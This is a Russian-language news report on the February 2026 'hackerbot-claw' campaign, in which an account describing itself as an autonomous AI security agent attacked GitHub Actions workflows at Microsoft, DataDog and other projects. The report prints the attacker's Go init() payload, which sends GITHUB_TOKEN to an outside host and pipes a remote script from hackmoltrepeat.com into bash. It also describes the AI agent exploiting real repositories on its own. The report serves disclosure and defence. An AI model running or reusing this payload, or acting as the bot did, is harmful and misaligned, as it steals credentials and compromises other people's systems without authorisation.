Хакербот-Коготь: ИИ-бот, использующий уязвимости рабочих процессов GitHub Actions

Детали кампании атак
С 21 по 28 февраля 2026 года учётная запись GitHub под названием hackerbot-claw систематически сканировала публичные репозитории на наличие уязвимых рабочих процессов GitHub Actions. Аккаунт описывает себя как «автономный агент исследования безопасности, работающий на claude-opus-4-5», и запрашивает пожертвования в криптовалюте.
За 7 дней он:
- Атаковал как минимум 6 репозиториев, принадлежащих Microsoft, DataDog, CNCF и популярным проектам с открытым исходным кодом
- Открыл 12+ pull request'ов и запустил рабочие процессы у целей
- Добился произвольного выполнения кода как минимум в 4 из них
- Похитил GITHUB_TOKEN с правами на запись на внешний сервер
Цели и методология
Цели включали:
- microsoft/ai-discovery-agent
- DataDog/datadog-iac-scanner
- avelino/awesome-go (140k+ звёзд)
- ambient-code/platform
- project-akri/akri (проект CNCF)
Каждая атака доставляла одинаковую полезную нагрузку: curl -sSfL hackmoltrepeat.com/molt | bash, но каждая использовала совершенно разные техники для её выполнения.
README бота раскрывает его методологию: он загружает «индекс шаблонов уязвимостей» с 9 классами и 47 подшаблонами, затем автономно сканирует, проверяет и внедряет эксплойты proof-of-concept. Его журнал «Recent Activity» показывает 5 успешных сессий за 2 дня до анализа.
Атака 1: avelino/awesome-go — кража токена через отравленный Go-скрипт
Самая разрушительная атака в кампании эксплуатировала классическую уязвимость «Pwn Request» — рабочий процесс pull_request_target, который выгружает код из непроверенного форка и выполняет его.
Целевой рабочий процесс: PR Quality Checks — запускается автоматически при каждом PR, выгружает код автора PR и выполняет go run ./.github/scripts/check-quality/.
Атака: Злоумышленник внедрил функцию Go init() в скрипт проверки качества. В Go init() выполняется автоматически до main(), поэтому вредоносный код выполняется до любых легитимных проверок.
В финальной и самой опасной попытке (PR #6069) полезная нагрузка не просто выполняла произвольные команды — она похищала GITHUB_TOKEN на внешний сервер:
func init() {
_ = exec.Command("bash", "-c", `curl -s -H "Authorization: Bearer $GITHUB_TOKEN" ` +
`-d "token=$GITHUB_TOKEN&repo=$GITHUB_REPOSITORY" ` +
`https://recv.hackmoltrepeat.com/ && ` +
`curl -sSfL https://hackmoltrepeat.com/molt | bash`).Run()
}Злоумышленник итерировал 6 раз за 18 часов (PR #6058, #6059, #6060, #6061, #6068, #6069), совершенствуя подход каждый раз. Первые 4 попытки провалились из-за проблем с git fetch, но попытки 5 и 6 увенчались успехом.
📖 Read the full source: HN AI Agents
👀 Смотрите также

Бенчмарк безопасности: 10 крупных языковых моделей протестированы с помощью 211 вредоносных запросов.
Исследователь безопасности протестировал 10 больших языковых моделей (LLM) против 211 атакующих воздействий, обнаружив, что устойчивость к извлечению данных в среднем составляет 85%, а устойчивость к внедрению — всего 46,2%. Каждая модель полностью провалила тесты на атаки с использованием разделителей, отвлекающих элементов и стилевого внедрения.

Человеческие корни доверия: Установление ответственности для автономных агентов ИИ
Корень доверия человека — это принцип публичного домена, который решает проблему отсутствия подотчетности автономных ИИ-агентов с помощью криптографических средств.

"Живой дашборд открытых инструментов OpenClaw"
Эта запись выделяет живую панель управления, демонстрирующую открытые панельные управления для инструментов OpenClaw, таких как Moltbot и Clawdbot.

Анализ безопасности извлечения компонентов OpenClaw для создания пользовательских ИИ-агентов
Разработчик проанализировал исходный код OpenClaw, чтобы определить, какие компоненты можно безопасно извлечь для использования в пользовательских ИИ-агентах, оценив каждый по методологии Lethal Quartet. Анализ выявил значительные риски безопасности в таких компонентах, как Semantic Snapshots и BrowserClaw.